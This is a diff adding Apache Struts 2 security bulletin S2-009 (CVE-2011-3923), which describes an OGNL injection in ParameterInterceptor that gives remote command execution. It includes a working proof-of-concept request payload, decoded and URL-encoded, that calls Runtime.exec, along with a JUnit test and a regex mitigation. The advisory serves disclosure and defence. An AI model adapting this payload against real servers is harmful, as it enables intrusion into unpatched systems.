+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-009</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-009.html">S2-009</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-009</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27836151">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27836151">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27836151">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27836151">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-009-Summary"></a>Summary</h2>
+
+
+<p>ParameterInterceptor vulnerability allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2312">Struts 2.3.1.2</a> or read the following solution instructions carefully for a configuration change to mitigate the vulnerability</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" r
 owspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.1.1 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> Meder Kydyraliev, Google Security Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3923" rel="nofollow">CVE-2011-3923</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Original Description</th><td colspan="1" rowspan="1" class="confluenceTd"> Reported directly to security@struts.a.o</td></tr></tbody></table>
+</div>
+
+<h2><a shape="rect" name="S2-009-Problem"></a>Problem</h2>
+
+<p>OGNL provides, among other features, extensive expression <a shape="rect" class="external-link" href="http://commons.apache.org/ognl/language-guide.html#Expression_Evaluation">evaluation capabilities</a>. The vulnerability allows a malicious user to bypass all the protections (regex pattern, deny method invocation) built into the ParametersInterceptor, thus being able to inject a malicious expression in any exposed string variable for further evaluation. </p>
+
+<p>A similar behavior was already addressed in <a shape="rect" href="s2-003.html" title="S2-003">S2-003</a> and <a shape="rect" href="s2-005.html" title="S2-005">S2-005</a>, but it turned out that the resulting fix based on whitelisting acceptable parameter names closed the vulnerability only partially. <br clear="none">
+Regular expression in ParametersInterceptor matches top['foo'](0) as a valid expression, which OGNL treats as (top['foo'])(0) and evaluates the value of 'foo' action parameter as an OGNL expression. This lets malicious users put arbitrary OGNL statements into any String variable exposed by an action and have it evaluated as an OGNL expression and since OGNL statement is in HTTP parameter value attacker can use blacklisted characters (e.g. #) to disable method execution and execute arbitrary methods, bypassing the ParametersInterceptor and OGNL library protections.</p>
+
+<h2><a shape="rect" name="S2-009-Proofofconcept"></a>Proof of concept</h2>
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>Vulnerable Action</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+public class FooAction {
+    private String foo;
+
+    public String execute() {
+        return "success";
+    }
+    public String getFoo() {
+        return foo;
+    }
+
+    public void setFoo(String foo) {
+        this.foo = foo;
+    }
+}
+
+]]></script>
+</div></div>
+
+<p>Here's an actual decoded example, which will create /tmp/PWNAGE directory:</p>
+
+<div class="preformatted panel" style="border-width: 1px;"><div class="preformattedContent panelContent">
+<pre>/action?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)&amp;z[(foo)('meh')]=true
+</pre>
+</div></div>
+
+<p>encoded version:</p>
+<div class="preformatted panel" style="border-width: 1px;"><div class="preformattedContent panelContent">
+<pre>/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&amp;z[%28foo%29%28%27meh%27%29]=true
+</pre>
+</div></div>
+
+<p>And the JUnit version</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeHeader panelHeader" style="border-bottom-width: 1px;"><b>PoC</b></div><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+public class FooActionTest extends org.apache.struts2.StrutsJUnit4TestCase&lt;FooAction&gt; {
+    @Test
+    public void testExecute() throws Exception {
+        request.setParameter("foo", "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new " +
+                "java.lang.Boolean(false), #_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true), " +
+                "@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)");
+
+        request.setParameter("top['foo'](0)", "true");
+
+        String res = this.executeAction("/example/foo.action");
+        FooAction action = this.getAction();
+
+        File pwn = new File("/tmp/PWNAGE");
+        Assert.assertFalse("Remote exploit: The PWN folder has been created", pwn.exists());
+    }
+}
+
+]]></script>
+</div></div>
+
+<h2><a shape="rect" name="S2-009-Solution"></a>Solution</h2>
+
+<p>The regex pattern inside the ParameterInterceptor was changed to provide a more narrow space of acceptable parameter names. <br clear="none">
+Furthermore the new setParameter method provided by the value stack will allow no more eval expression inside the param names.</p>
+
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2312">Struts 2.3.1.2</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div>
+
+<p>In case an upgrade isn't possible in a particular environment, there is a configuration based mitigation workaround:</p>
+
+<h3><a shape="rect" name="S2-009-PossibleMitigationWorkaround%3AConfigureParametersIntercptorinstruts.xmltoExcludeMaliciousParameters"></a>Possible Mitigation Workaround: Configure ParametersIntercptor in struts.xml to Exclude Malicious Parameters</h3>
+
+<p>The following additional interceptor-ref configuration should mitigate the problem when applied correctly, allowing only simple navigational expression:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;interceptor-ref name="params"&gt;
+	&lt;param name="acceptParamNames"&gt;\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*&lt;/param&gt;
+&lt;/interceptor-ref&gt;
+]]></script>
+</div></div>
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1">Beware that the above pattern breaks <a shape="rect" class="external-link" href="http://struts.apache.org/2.3.1.1/docs/type-conversion.html#TypeConversion-CollectionandMapSupport">the type conversion support for collection and map</a> (those parameter names should be attached to acceptParamNames variable).<br clear="none">
+For this configuration to work correctly, it has to be applied to <b>any params interceptor ref in any stack an application is using</b>.<br clear="none">
+E.g., if an application is configured to use defaultStack as well as paramsPrepareParamsStack, you should copy both stack definitions from struts-default.xml to the application's struts.xml config file and apply the described excludeParams configuration for each params interceptor ref, that is <b>once for defaultStack and twice for paramsPrepareParamsStack</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file



Mime
View raw message